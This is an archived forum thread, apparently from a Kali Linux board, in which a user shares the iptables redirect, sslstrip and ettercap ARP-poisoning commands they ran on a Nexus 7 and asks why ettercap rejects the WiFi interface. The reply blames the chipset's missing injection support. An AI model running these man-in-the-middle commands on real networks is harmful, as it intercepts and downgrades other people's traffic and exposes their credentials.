PDA

View Full Version : ARP Poisoning not working on N7 2013?



thecapitalr
2013-11-05, 22:58
Hey guys. Got Kali up and running via linux deploy on my N7 2013. I entered the following commands:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -k -l 8080

open up a new terminal window

sudo ettercap -t -q -i wlan0 -M arp // //

and it spits out the error: Interface not suitable for level 2 sending

any ideas? i am running cleanrom 1.7 which is essentially stock 4.3.

BeNe
2013-11-09, 23:13
You can not use the internal Wifi-Adapter for this. No monitor mode/injection is available with this chipset.
So use a external one. But there is still a kernel missing. Check the pwnie express forum. There is a Pwnpad section...